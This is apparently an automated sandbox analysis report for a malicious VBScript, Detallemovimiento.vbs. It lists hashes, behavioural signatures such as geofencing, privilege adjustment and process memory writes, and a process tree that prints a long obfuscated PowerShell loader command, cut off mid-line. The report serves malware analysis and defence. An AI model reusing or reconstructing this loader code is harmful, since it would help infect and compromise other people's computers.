Analysis
-
max time kernel
160s -
max time network
177s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 13:44
Static task
static1
Behavioral task
behavioral1
Sample
Detallemovimiento.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Detallemovimiento.vbs
Resource
win10v2004-20221111-en
General
-
Target
Detallemovimiento.vbs
-
Size
439KB
-
MD5
1d50e209ab21cd2035f0727bdf51c6bb
-
SHA1
a9f206e9940d6f6b5abe7d608dfb15a20d5cf5f1
-
SHA256
a615a0e25040ca39c49560c9594c69f4ff6754faf0304c6e89c923cb340c9319
-
SHA512
4d20bfd9c71956ccc87af37de1468445d5b1b87bab1eea6b7b9d0d6298d1b879e962d2615ff4e58fdc7eacbf2badc5277bc87930baee0ac02885dbcea3bb8ff9
-
SSDEEP
6144:sDKtRixP0uu/1PM4Ramn3DBqVei8zWH30BiZSgP4K9LuTrEo7K08HIyGshUhBQxu:MK7iZ8PM4qVeHz0kBip4tQghmxxTs
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 916 powershell.exe 916 powershell.exe 4720 powershell.exe 4720 powershell.exe 1416 powershell.exe 1416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 916 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2988 wrote to memory of 916 2988 WScript.exe powershell.exe PID 2988 wrote to memory of 916 2988 WScript.exe powershell.exe PID 916 wrote to memory of 4720 916 powershell.exe powershell.exe PID 916 wrote to memory of 4720 916 powershell.exe powershell.exe PID 916 wrote to memory of 4720 916 powershell.exe powershell.exe PID 4720 wrote to memory of 1416 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 1416 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 1416 4720 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Detallemovimiento.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pigs = """NoFKouBynOpcUntOciAmoHynMo SkHAnTCeBUn Po{Pr Ob Fa Wh RepapaDdrUnaBumIn(Sy[MaSbltSprSeiMinChgPa]Sa`$GlHJaSSi)Sp;Ci Na He Ta ga`$PeBUnypetBoeHosDi Sy=Ot PrNEleRawFa-NyOOubByjSueRecPatAf KobStyPitMyeRe[St]Ma He(Sk`$PtHBoSIn.SkLUneVsnAfgMatAmhTe Mo/Da Sp2Bi)De;My Tr ov Sc RaFSaofarFa(Pe`$noiUn=Ar0Ov;Ec Bo`$VeiRe sp-YnlAmtOm Fe`$ImHBlSFa.NoLKoeOdnFjgTytMahSu;In Fo`$FuiUg+Af=Gl2Te)An{ha mo Vo Ge Sh Dd Ph St Di`$StBToyUntUneDisDy[Su`$ChiMi/Tr2Go]Me Fa=Ta Hy[CacInoVenSuvPaeCorCetTe]Hy:ot:xeTunoTaBmiyFotPieHa(Fu`$AlHstShi.MeSReuStbSksMatOtrFoiGanopgNo(Al`$coiFa,Ph In2Ad)El,Pr Pr1Te6Fy)Ko;Ar su De`$AnBUuyTrtTeeMesBr[Ti`$IniUn/Ba2An]Bo Po=Ef De(Bu`$InBNiyGrtStestsEn[Al`$PhiDa/De2Ex]Sa st-UdbDrxSpoRirKn Ov1Ha6Fo0Fi)Te;Af Lo Br Sl Un}Un Ki[FrSBltFrrNeiDinSkgGe]La[UnSStyUnsPotFoeZumBl.SuTDyeCoxDrtFl.UnEubnKucBroNodMaiFrnnegra]ti:En:MiABuSSlCflIvaIKr.SlGJueMitfoSTatOxrAfiPrnPhgDi(Re`$RgbNiyintUneOpsGu)Mi;Sk}Bu`$SeYLunSqdDiiFigBehUneArdLaePlnejsFa0Hy=KoHGeTWeBBj Be'ThFLa3unDBl9BeDDo3MsDSu4DiCAu5TeCJaDNo8AuEUdCSv4ReCIsCAmCSkCDi'Su;Ha`$ScYTpnEpdIniFugMihtoeFodNoeBlnsksWe1Bu=ExHDeTgyBhj Tr'HyEFrDfuCEk9PrCWa3KeDCa2PaCMeFTsDOm3LaCInFPaCbe6OpDmu4Xe8InESoFKa7UdCHa9SoCgaERe9ab3Vi9Em2Ch8PoEImFBr5SoCBrECoDVo3HoCGl1arCEt6BlCcr5TyEUnESpCNo1unDSt4ReCSk9DrDug6TaCMi5PaEDiDCoCKl5PlDEc4StCKu8StCFoFGuCTy4AuDPs3Li'Sa;Gi`$VoYcanurdthiSogSohEveAfdSuetenArsDa2Ku=RiHUnTEfBOl Lr'GrECh7LeCUn5SiDAa4AlFSo0ShDKo2IsCLaFTaCfo3AfESp1foCSt4PrCTe4SuDRe2TrCVe5BeDAq3AnDCo3sq'Br;Ps`$TrYDynCodPyiHogSmhSteNedFreArnDesDa3Bl=MeHSaTovBUn Sa'beFGu3FlDBu9BaDKv3TrDTa4SlCDe5TyCBeDTi8MaEuuFBa2BrDCa5PrCStEObDRe4NiCSl9AmCSiDMuCst5Sl8FeEPoEPr9OvCOlEAaDFo4AuCDi5KiDEl2BaCOvFBrDFi0FaFje3HeCSp5FrDNo2SkDLy6CoCRa9JeCFa3HeCli5OpDWh3St8MoEstEAt8HaCEn1PrCSiEByCFo4ClCBeCfoCRe5PhFSe2WoCTa5AfCHy6Mu'hj;Ch`$peYacnSpdEpiElgTahStePodVeeLanWosFg4Kr=LaHErTOcBUd In'IaDYv3ReDAn4CyDXy2DeCIn9TaCTrEInCSm7Re'Un;sm`$BuYKvnTrdViiUngFohMaeDedPreStnAasUd5Af=LiHLoTGuBCy Fo'InESa7ToCve5AoDJa4PiEatDThCLoFsvCfr4PoDBo5TiCAfCGuCKr5TrEGa8TrCBi1DuCDuERiCsp4AmCRiCFaCDe5Hy'ap;Te`$PoYFonIndIniDjgFrhMeeGedSteSenfasFo6St=SuHUdTflBFa Al'juFUn2ArFFo4PoFUd3WhDWa0SpCDa5UnCko3BeCDe9SaCLi1PaCPrCNeEmoEBiCof1SaCtrDSnCTi5fe8DeCHa8Im0UnEBa8SeCUd9ZiCEl4AkCSp5AmENo2NoDHy9PhFKl3NoCUd9HiCev7Ri8EnCDo8Ha0UnFJo0ShDva5TaCEs2PoCplCViCLa9OrCFa3Ud'wi;Ha`$DaYRanGodFriMagNuhFreRedOneGrnTasfr7Kr=GaHInTArBCo Pa'SpFsv2coDLe5PaCfoENeDMo4UnCDu9HaCDeDRuCAn5Co8BiCAl8Ti0ruEBaDPrCcr1FeCYnELoCPo1onCSp7VeCPl5NoCBr4Do'mo;Be`$ReYDinFidAniMugSehwheSudSpeSinKisBr8Sa=HaHUnTByBAf Ki'UdFIn2GaCCh5RoCIn6UnCVaCOpCTr5LiCDe3BrDSt4JaCps5keCHa4StESv4NyCHv5MeCTuCJaCAu5CoCJi7MiCBy1PiDSk4UnCMo5Bo'Fr;He`$AnYGlnBodBoiYrgelhMieIndApeHonPasFe9cr=BaHLyTErBSe Ex'PrELo9FuCImETrEWaDBiCTy5OmCTiDSkCJoFSmDfy2SeDEs9PrESlDStCTsFGaCSy4BeDDo5TiCSpCMeCIn5Es'Te;As`$KnNStbUnefldFieelsMe0Fl=ReHStTafBDo Jo'MiEAvDMeDGa9VeESu4DiCOv5HaCShCSeCpa5anCBe7MaCMa1UdDKl4HeCSh5EnFAl4WiDCo9BrDSt0FeCHy5Sk'ho;Om`$BgNHybSuePrdFyeOfsFe1Ud=BoHHaTHeBFu Un'NeEFi3FrCSaCbrCPe1SaDAf3FiDMa3Ye8ImCSe8Mi0skFIn0frDLn5SkCGa2EnCMeCReCch9AdCWe3Fe8HaCra8Up0SuFPu3foCAf5KrCOp1FeCBrCTaCRa5SnCel4Bi8ShCCh8Mi0TrEAl1UnCSuEGeDre3AnCEn9JuECv3MiCsoCUnCPe1AsDop3RaDRe3Kl8SeCKl8Se0NoEAn1BeDAn5SaDOf4AcCFaFUrEDr3UnCCoCDeCPl1suDDa3FlDRe3St'Fr;In`$DaNDibBreGedIneCasRa2Dy=fjHleThoBAr di'DiEIc9grCStESmDHu6ReCBeFBeCadBunCOv5Am'Se;Un`$BiNMibDaeEkdRoeEjsFl3Pr=SpHKoTReBWi be'RoFBe0JuDTe5FaCAc2MoCNoCMuCTi9BeCSm3Sy8syCMo8Ue0HoEOu8FaCov9TrCSr4VaCbi5BaEdo2OpDAu9WaFUk3CoCsp9prCva7Pu8CoCCo8Po0buEPrEViCDo5doDMo7OpFRe3ToCStCdeChwFCrDGr4Mo8suCAl8Hi0PrFSr6StCDy9baDJi2EfDFi4DiDTa5DaCKy1MiCMiCDe'Sq;Pl`$GgNCybNoealdLoeAgsPe4Re=HeHLaTPeBLi Sm'UnFpr6exCLe9WoDBo2ScDbi4LeDSk5AnCPe1HeCWaCDiEGa1BeCTpCFlCUnCunCHiFCyCBr3Pr'Ju;Br`$AcNDibaneOpdSaeDesSe5ia=paHPhTKlBBa Sp'OuCKaESiDGo4AbCNo4DoCDgCChCClCEr'Af;Be`$SkNTrbBueStdAfeMisAs6Af=PoHHjTCrBTr ge'SqEUsEOpDZu4CoFPa0JaDtr2TrCInFPrDBe4PaCAs5FuCSp3CaDUn4CoFTi6HaCDi9MaDHa2EuDSl4UnDGr5StCIn1ReCFiCUlEUfDPrCMi5TyCInDErCheFKoDSi2huDla9Pa'Li;Op`$IdNtabSkeIrdEneRysTi7De=CrHReTUnBHe Pe'DiEAf9GlEPe5FoFKa8Do'In;Pa`$JuNGlbPaePrdNoeGasTe8Ba=KoHScTUnBMi Al'stFSiCPs'Ou;udSVieSotLa-KoAKulRuiSpaUdsSa Re-RinLeaBamQueRe UdNNobEleRidBleRisAr9Pl Pr-FivPoaFolStuCyeGr di`$TiNMibPseUndLneMosEc7As;InfLiuSknUscRetWoiSkoSknIn lyfOrkTtpun Ra{MiPMaaAnrhyaGrmAk Rk(Pa`$OovUd_temDo,Ca Hj`$DavDr_KipDe)Fa Cy Om pl Gr Sc;Ic`$ApUSanSkcSkoJimSimUdoFlnFrnIneousIasSh0Me Fo=AzHTrTNoBSt Se'De8Fi4HiDAv6AnDSa5UnCMyEOvCRnDVo8Fe0Ho9CoDNe8Wh0Ch8Pl8ReFAfBKaEDi1ReDOd0InDKl0UnEWe4FlCYoFBeCUnDStCSy1SoCUd9LaCPrEVaFTeDGe9PhAPe9MeANeEPr3AfDDr5HuDLn2ElDVo2PeCSt5TrCAnEsoDir4SjESe4OrCPoFItCOsDafCXy1EmCAf9PeCLiEOv8ReEMeEch7EmCBo5foDNa4tiEin1sjDEg3KuDBa3BrCUd5CoCFlDHoCSo2alCArCHoCRe9SuCSw5SmDPr3Kl8Fo8Tr8Mo9So8Ru0FoDStCEk8Pr0RaFIz7EnCep8CoCMa5FjDFj2SeCSk5Zi8WaDLoESnFpaCHa2SaCtrAprCSu5OvCEm3BiDBy4Sk8Se0FoDDuBRe8Sk0Ov8Br4MaFHuFFr8HyEDiEAc7NoCLaCDaCVeFcoCUd2InCLi1UnCApCBaEKn1TuDun3HaDFo3PhCpr5foCAlDTiCSe2ExCBeCBrDHy9EnETu3SiCTr1KoCPe3WeCAn8InCRe5Yo8Re0Sa8UmDDiElu1leCTaEkaCGo4Lg8Tr0Re8Mo4KtFKoFCa8FrEAcEWoCUnCReFJeCEx3UdCPt1KoDAt4FrCHa9TiCPrFveCDoEWh8SkEBrFDi3ElDTe0NoCSnCWrCRh9PoDCu4am8Ph8Di8Pa4ApELiEFoCPe2KaCUg5SkCBe4NoCFo5ToDTr3Ma9Lu8Af8Tw9ThFGlBFo8SoDXy9ju1InFBeDtr8UnEStEUn5unDBe1HaDTa5geCAb1FuCunCspDPr3Li8Tr8Ti8Nu4PoFMy9MyCPjEUnCRi4ReCHa9CiCHa7PaCPr8PoCMy5OvCFu4UnCEn5TeCInESaDRe3Ka9Ho0Bo8Sn9Ba8Ba0LiDNoDBo8Ta9St8TeEJyEHa7FlCSt5haDAg4FeFMi4CrDVa9DrDso0TeCAl5Na8Pr8bj8Ca4SyFSw9SaCDeEDeCFo4CaCMe9KaCCy7reCin8SwCth5InCMa4ToCBu5CyCTaEEnDBo3fl9Am1Rd8Tr9De'Vg;PeNPrbPreOvdkoeMosUd9Nu De`$LeUOpnRecCoogemRemReoBlnGenBreResassHj0es;Hj`$HoURenSrcOroJimnomCooIanAnnSaeCisNosVa5Ho Ja=Kk CoHKnTFrBPu Un'Sk8In4ApDIn6ExCJa1DiDEn2QuFSyFRaCUd7RaDDe0ReCLa1Ba8ou0Fo9tvDRe8Ku0Br8in4SeDHo6UnDAr5SaCKaEPoCEnDSt8GeEFoEDr7PrCac5NaDEu4FoEWoDWeCRo5SpDTr4DoCPr8BlCbeFRaCTo4Ko8Fr8Re8Gi4CaFPh9SmCReEEfCAi4PaCEp9AnCSi7GlCPh8DiCad5HeCsl4VuCEt5stCBrEOcDBr3De9Lo2Sc8NuCmi8Ek0PlFStBPaFAr4TrDMo9SiDAr0EmCGe5ciFsuBFjFChDUlFCoDAf8we0BiEPi0un8Sk8Ma8ko4BoFSt9skCFoEScCAe4ShCMi9MeCRe7UtCOp8PrCPa5ReCre4OpCCa5PeCGlEPuDLa3Sa9Mu3Ee8CoCFo8Se0Th8Na4StFBi9RaCHaEGeCEt4KnCDa9DiCFi7TaCTo8OpCTa5BrCUn4LeCSp5MoCOvEUnDSa3li9Si4Pr8Us9Os8Up9Sw'Da;PrNClbDyeNedmeeMisGh9Su In`$seUUtnMicZeoTrmSqmKooPonexnRoetosAasAc5Me;Im`$SkULsnTacHgoHimBlmEmoPsnArnHyeLasDesBy1Ja Ap=om AeHskTUeBUn Kl'PhDUn2GrCsk5OrDKv4ReDpr5haDCr2AnCFiESu8Sv0Pa8Re4PrDIn6saCAl1UnDSt2BrFArFneCKo7SuDCa0TrCFr1Ni8TeERaEPa9CoCSkEHaDAl6AfCSpFFoCDeBPoCBn5Fe8Sp8Di8Fu4EbCcaECrDsc5ScCLeCInCHyCFo8EgCpr8Pi0BiEIn0Vi8Ju8DrFMaBSuFFi3RaDKv9TsDAr3GuDRi4LoCSc5PeCDoDSt8PiESuFSt2OvDta5AlCUnEAtDAr4GuCFo9ArCBaDThCfl5Co8SmEAmEMi9KeCAlEtiDSn4SkCTe5ReDSn2MeCThFmeDMi0LeFMu3TrCTa5StDDr2KoDSl6PeCTr9AdCsk3DaCPh5SeDAd3Pe8GrEAnEFu8CoCVd1ExCAlEAnCBu4SkCShCUnCOp5UlFLa2GaCFo5prCRa6SpFbeDAf8Pr8DiENoEBrCTn5HoDDi7De8coDPyEUnFloCOm2CaCVeAUsCFi5FoCoe3SiDSn4Sk8Be0BaFPr3GrDPa9ReDTv3AuDDu4BrCBe5KiCFoDDu8HaECrFhu2ToDSl5ReCloEThDSe4SkCFl9SkCAkDStCEs5Ke8PoEBrEFu9CuCAmECrDGa4DeCVi5GaDMe2PrCCoFSkDLn0flFKe3BiCBe5SoDPl2LuDLa6MaCKl9TrCAv3UdCDl5FoDBi3su8atEEsEVi8HoCTa1FoCOnEFoCSk4FlCSeCSaCPr5VaFRa2PaCPr5CoCKr6Ro8va8Ca8Ve8FjEYvEDrCPo5SpDSt7Tu8skDGuETaFAnCAr2ReCRoAFyCGo5UrCFe3MaDLo4Ra8Om0PaEPi9UnCOpEOvDSu4DoFSl0FoDDo4UnDUn2Bu8Sk9Li8beCHe8Di0Ja8De8Ko8Ga4RaDSi6ElDMa5SuCPoEGrCKrDoc8JaEjyEmi7blCAt5GrDRe4CrELeDApCmo5VaDNo4PsCSy8SpCReFFeCSa4go8Ar8Ju8De4cuFLi9DyCBiEBeCSn4HaCTi9InCPa7MaCSr8fiCum5MiCTr4UdCMe5GoCBrEGeDfe3Ae9Ak5Sk8Gr9Du8Pr9Ci8tuECoEta9jyCPoEslDSu6meCTaFAaCReBUnCFr5Ju8to8ou8Vo4DrCNoEStDPl5EkCReCAfCBeCBj8TaCfo8Ge0TeEBr0Mu8Sq8Bo8Bu4FoDDi6NoFPrFRuCKrDLa8Ca9Fe8Gu9Un8Re9Ac8Gr9Co8DiCRe8Ce0Gl8Fo4CrDHy6KoFReFRaDSa0Av8St9Di8Li9Bl'Re;ChNLabEleStdEfeEnsFr9Mg Di`$afUSpnJucAfoAemKamProSknGanReeBlsmisMu1to;Ci}BefFuuPonGacIntSiiGaoPrnTh TiGDiDSlTSi Or{svPDoaBrrPeaFomBr Ig(Ce[FuPAlaVurSlaEkmIdesptPaeJorMe(OpPstoStsIniRetReiAgoOfnVa Kn=Ne Om0Fy,Gi DiMHuaTjnKldCaaUntTioPsrMoySk Ud=ne Sp`$OmTSyrSouSteSt)Fo]Tr Ad[fuTKayLopVaeBe[Mo]Li]Fi Ol`$HovPoaSarAf_frptoaskrKoaEtmKaeFrtSkeForUnsse,St[ByPSwaChrOuaSymBeeAntFreGorCa(EnPoloPespoiChtUniShoEmnPa Re=Hy As1An)Di]Cl Hr[GlTTiyAlpLiePi]Sk Ho`$AfvTirPrtPo Ja=At Ac[EnVPaoDeiBadPo]Fr)Di;Br`$BeUArnTrcHioTamInmZooJunAfnOmeLesHysAt2Kn Er=Da DiHLaTViBDi de'Un8Se4PsFPr6PaFUn4SoETr2Gi8Ru0Fe9UnDSo8Po0ReFnoBasEDe1YdDfr0BrDBe0AvEAd4SpCSeFBoCKaDKlCTo1KoCov9poCTaEReFEmDSa9VaABr9JuAgeEHa3ScDLi5LiDTe2snDun2NeCMa5dyCReELuDFl4AtESk4KrCVeFByCVsDFrCSo1coCDo9BoCUnEap8UnEBrEKo4RaCSt5NoCKo6KoCCh9HyCvaELaCPh5MoEMe4NyDOs9FuCSpESlCPh1FaCViDExCka9TrCMe3SkEco1FoDVa3PaDMe3CaCKl5ReCAnDSlCAr2SiCBaCOvDTe9Ca8Ox8Vi8St8NaEEnECiCAd5UnDFi7Pr8ruDCoEKuFKrCTi2AiCseAJoCCo5MaCDi3AmDMa4Ar8Sa0UdFEf3SuDMi9SeDTr3ApDPa4OxCRe5EkCNeDOv8CiEKaFSu2EkCIr5JiCge6geCFiCTrCGh5GoCOb3AlDUn4UnCSn9SaCStFAnCFlETa8BeEFeEjo1BrDRe3RoDko3StCSe5FlCHoDSuCAc2ElCZeCCoDka9boEPuEPoCCo1BlCakDSrCte5ch8Za8da8Tr4CiFMo9FiCTrEGeCPh4PrCHe9ReCZo7AaCSk8BaCRu5UiCAj4BiCPr5SiCToELaDSo3Sn9Ta8Bu8Un9Ro8pa9Dy8InCja8Me0UnFAnBBoFHu3ScDHe9InDPe3tiDAc4EnCKo5tiCUdDto8EqENoFGy2thCAf5OpCin6UnCCoCReCPl5BrCKa3PoDSu4MiCSh9stCBaFEmCAaECa8ldEChENv5UnCSpDhnCSt9DeDIn4An8AuEPrEAk1PiDUd3MyDEv3RiCNa5SpCBaDKnCSa2DiCsuCOcDWe9EfETr2ExDVa5GrCHm9BaCGlCGaCKe4UdCSp5HaDMa2UnEUn1LbCAt3DeCDi3TiCst5BrDUd3ViDfr3heFanDSu9PrAHa9ErAbuFHr2SkDUd5moCLoEFl8Ti9Ny8HaEAnEId4ReCTa5anCTa6FjCEf9JrCVaESoCTv5LuEpo4AgDDa9HuCPrEKnCOp1SpCStDGoCac9prCAp3AnEDiDSlCNaFFoCSk4LaDSp5EpCReCFoCPa5My8Af8Pa8Mo4TeFHa9TaCOkETeCpr4HrCPa9PlCLu7ViCHe8PaCAs5GlCAu4poCGe5ViCBoEArDWi3Lb9Tu9Co8DiCLe8Ga0Pr8Gi4SeCab6HaCUn1VoCStCFeDSp3koCTy5Se8Tr9Su8brECtEWh4ShCTa5UnCAt6ErCGa9giCSuEUnCPl5CoFka4HeDSt9riDLk0TaCUn5Ha8Ki8Un8Af4FaEKoEraCSr2toCKo5NeCke4HeCFe5ShDMo3Pr9An0Al8TiCZo8Gr0Dr8be4PaELiEUlCRe2LyCSu5EtCHj4saCKu5SeDIo3Im9Sk1Ea8HaCkl8Ar0TrFMeBCiFmi3DoDDi9udDHo3prDLy4MeCsa5udCmoDIn8UtESmEanDFrDCo5AmCStCKoDBl4chCla9PaCVa3CoCau1UhDRa3AsDFr4IoEUl4moCLe5PaCPiCChCBe5ThCIn7LiCSk1FiDCh4CoCJo5CrFNuDPa8El9En'Ko;MaNFrbTheSpdReeFosSo9Am Se`$edUUdnEncOnoComKnmSyoStnMtnUreGrsPasPr2Kn;Un`$GlUVenHocCooRemMimPjoAcnConAleAmspesTr3So Kr=Hj DaHscTvaBSi sk'Ek8Un4StFFl6CoFSa4DiESl2Ni8LiEDiEFo4AnCSo5guCOr6JuCAn9GrCBoEHaCWi5GaEEr3MuCPnFneCSaESeDWa3ChDMu4BrDPo2PrDPs5HkCpu3TrDHy4SuCLaFSkDRe2De8El8mu8Ch4MeFAt9AlCChEBlCCu4UdCRe9BiCku7LaCMy8TeCKa5NoCKa4AfCBa5boCZoEJvDHa3Fi9Ro6Un8MyCFl8Li0DiFBiBReFCh3SkDOv9InDKu3prDVo4fuCOp5PaCCiDKa8AcEPaFAb2udCPa5UkCUd6ReCUnCPoCCh5PuCPr3PeDAr4ReCDi9PrCHeFNoCPhEPa8TrECeEFo3KlCAb1BeCGiCGlCPhCBeCDi9HeCUdEInCOv7BlEsa3TrCRaFAfCroEDuDCa6OmCRt5BiCKaEBrDNo4UnCPr9LgCNoFTaCBeEFnDAl3InFBeDOp9MoATr9InAThFFa3HeDUn4BoCSk1inCKiEScCfo4LaCFo1PrDVe2BlCNo4De8SiCKa8Af0fi8Fo4PaDAu6BkCEn1StDMi2SuFTeFCoDSu0DaCVi1UnDFr2spCCa1OvCUdDVoCCa5ChDSt4OvCLd5StDKe2SuDHy3Ri8Mo9Lo8NdEBiFLe3AuCGr5ApDCo4StEGr9TiCPnDSuDFi0ChCPoCTaCGr5StCToDEvCHa5OpCPaEWiDDu4TyCSp1PaDOr4EuCCu9WiClaFOtCPrEGrERe6SeCPrCkiCSt1GrCTi7UnDVa3In8Go8co8Ch4SpFGr9DrCCeESkCPy4DeCRa9RoCah7ChCre8OpCMa5GrCUn4SeCen5SuCHoEAcDSt3Ri9Te7Vi8La9Ju'Ca;ilNOvbIneKudRieAlsIn9Co Cy`$boUGlnPrcUdoMamStmtioMynganBaeAnsWasDe3Fo;So`$LaUKunOocAcoOvmInmCeoRenZinGieSpsSisUn4Vo Fr=Pa FaHPrTMiBPe Ko'Ci8Sc4PrFDe6TrFAn4DiEBe2Ca8SpESpEFl4ScCNo5BuCKk6BiCha9MiCFeEJaCIs5FiEReDSuCGa5FgDVe4BiCOu8OuCPaFDiCMo4Ti8al8Vo8Et4FiEArEhaCDe2TaCob5TiCSi4SvCOr5GrDBi3Ap9Ee2Sk8FiCKa8Gr0An8Sq4inEGeELyCCl2ReCVa5QuCGr4MoCVa5AtDCe3Fa9Re3Cl8UrCAf8Or0Sh8Ut4GlDTr6PaDTr2AnDDy4Mo8LaCBo8Ba0Ad8Sv4UnDta6HaCDe1prDDe2TaFInFUdDSk0CoCEm1KoDNo2BrCEj1YaCMaDTaCBa5scDTe4FaCUn5NaDUn2AuDEp3Te8Hy9Fr8AgEMeFKo3AaCMe5DoDDe4FoEdo9CoCChDReDRh0TaCpiCErCMo5GrCTrDAnCNg5ObCStEPiDRe4BeCTe1PhDMi4SpCUn9GaCSaFIlCOuEAfETi6PrCBeCAlCEx1PeCMe7boDAt3th8Ox8Su8Eu4StFKd9ElCKiESuCCl4ScCKr9BaCsj7PoCSl8BeCFi5BiCVe4UdCGv5MiCSaEsaDPa3bl9ci7Pe8Ce9At'Se;apNPrbTaeHadUneFlsaz9Ch Va`$VaUPunIgcKooRemSpmVioStnTrnFleFusunsou4Me;Hy`$LuURenCacPooAsmArmInoLenLonDeeOpsPesFi5ad Un=Am LaHUoTRaBTr Sa'LaDNo2DkCBu5VaDCr4SkDDr5soDTo2CrCBoEEs8Pl0St8St4AnFOl6HuFva4TrEAl2St8saESoEDo3DoDWi2ReCSa5FuCRe1AfDRo4LeCEn5MiFKi4StDUd9BrDSk0ThCBl5Te8Ns8me8Si9Ye'Fr;SnNBrbUneMadPaeSusTa9He Bi`$UnUBenNocCooTrmChmHooFonZonNoeRasBlsSk5Tr Op Su Bi;Sy}Ry`$spkmekSk Re=Br MuHpaTAfBEp te'CuCClBKvCCo5HiDDr2GaCdeETyCAm5FlCIlCpo9An3Ge9Gr2Fa'te;Vi`$PrUGgnVucknoEjmUtmCoodrnStnBleApsYesFr6Kv He=Is MiHCaTDeBLa He'ma8Hu4KrDPr6PaCun1FiDAf2NaFClFsnDIn6SaCSi1Ta8Re0Or9NeDBu8Pu0AlFLuBSaFOp3AtDKo9VaDNo3UdDBa4ReCSo5CoCChDVi8AnESmFSp2SoDIs5KyCRaEFlDFl4PrCCh9taCGaDskCCo5Cr8TaESeEhe9CaCAmEmaDMo4ReCdi5MoDTo2SuCUnFPrDIl0IlFAc3TaCWo5BrDGr2MyDSu6ApCFu9InCCo3HyCAs5BlDUd3Se8CaETiEseDOmCSh1SuDPa2VeDSo3OrCAr8OpCTr1FoCKuCChFNoDSw9TyAGe9NiAHuELa7DiCTu5MaDBl4TuEUn4HeCCy5FaCByCAnCSc5HeCPo7NoCEr1MiDVi4FoCSi5SeEVe6NoCNoFNaDCh2SpETh6RaDAu5liCZoEHaCOr3PaDMy4MrCBu9SaCUnFStCFrEAnFaa0GeClaFdeCZo9spCRoEUbDAf4ZeCTa5DeDEv2ro8Su8ch8Bo8BaCSu6FuCPsBUnDkl0Ou8Mo0Ba8la4NoCIdBCaCFjBOp8Nu0Az8Ud4DeEJoEReCMe2BlCPo5frCDa4BuCSu5PrDSy3Ev9Fl4Ti8In9Pu8ImCRa8At0Ko8Sa8RuEPe7TvEIn4abFSp4Da8Ta0HaEho0St8Gl8GoFHaBCoEMo9KeCisESeDCh4KoFOr0MiDCo4UdDPr2KoFkrDRe8UnCRa8Cc0NaFNaBNuFAm5CoESk9UdCSuELoDga4Va9Re3Cy9Ba2LoFBeDTr8ReCEr8Fu0GeFgeBAnFSo5SeEFo9ToCguEAtDZo4Sp9Un3Br9So2ReFdiDCo8GuCLn8De0BeFSkBSyFMa5UnEUn9PuCTiEMyDRe4Pe9Ho3Pa9Di2CeFPrDRe8Fl9ps8Se0Di8To8SwFNoBSaETa9NoCMaEBuDFr4SlFMe0QuDAc4SaDBa2HeFLdDKi8An9Bu8Un9Me8Sp9Da'Ke;TyNLabBaesidSoeCasRt9Un Sv`$KeUBlnSkcBeofemSamTooBlnFanBreResResTr6Af;Be`$AxvBaacorVa_FonGatEv In=Ra VefTakKopVe Sp`$foNnobDyeTudTueLesCu5In Or`$UnNBlbPleEmdSkePrsPa6Re;Sm`$MaUConOccCroFamPrmGioPhnHynBlePrsAlsFr7ut Sm=Ve VeHUpTpaBDe Vi'Su8By4TiFSe3HuDpo4RiCFl1udDMd4MuCUnFPoCSn9GrCIlCCh9Po3Ma8Ed0Re9EsDTi8mi0fo8Co4BiDAn6DoCAa1AbDPe2BrFArFTrDFi6FgCIr1Fl8TaEUnEin9TaCLeETrDBr6EcCPoFUlCTaBGoCSn5Or8Ve8SeFFiBBiEDe9MuCfoEBeDNe4JoFAr0PrDSu4KaDNo2BrFSoDUd9TrAFo9PlANoFSpAsaCLa5AlDIn2FeCDeFHi8FuCGu8Un0Su9De3He9Sk6Tr9Fo2fo8PrCMu8We0Ku9Aa0InDPa8Un9un3Gr9Co0Br9Ge0Fo9Ra0sa8PaCSp8Op0Ru9To0PeDTh8Br9Fo4Sm9an0Br8Di9Av'fl;InNEqbsieBudcaeSosCa9Un Bu`$TyUBengicSeoVumOkmCyoUnnFrnSkeSesVasSi7mo;Pa`$ImUTynPucReoBrmBemUdodenStnCreKgsmisCl8Co La=Te CrHDeTStBNi Ap'Fo8Bl4HaCRaFKeDLu2SnCSk9Sk8Sk0Ov9HlDMa8Dd0Gr8Re4apDPr6HeCBa1StDRe2SaFPaFChDLi6VaCTh1Ma8SuEBiEKi9TrCLoEOvDco6RaCfoFRhCUnBpoCKo5Fa8Bo8taFMeBSkEre9DiCAdEMeDSt4UnFNe0PaDUn4TrDRe2HoFMoDAk9DyAPe9GeAPaFDiAMiCAg5EpDAc2ToCSeFKo8MyCEm8Ga0Pa9St0LiDOm8Pr9Ta1Un9Yd0Tr9Fl0Re9Fr0Kr9Tr0Al9Sa0Da8DaCFl8Be0to9Su0BuDRe8Af9In3Sa9ba0mi9In0Te9Pe0Ad8FiCOd8Un0mo9Ho0TrDRa8Af9Ap4Un8Gu9Be'De;MoNUdbtiepodDyeDesfo9To Be`$NaUStnTacrooUsmDvmPioStngenBaeCasMisCh8Co;Ca`$PaTDirSkeBodOsvBatSaeNodKaeFolAdeCanuneSu=Pa(JaGCeeRitDr-UnIOrtUneFlmCoPBerMioEfpOmeHerRetmeyOb Ta-slPLuaOrtBrhEn 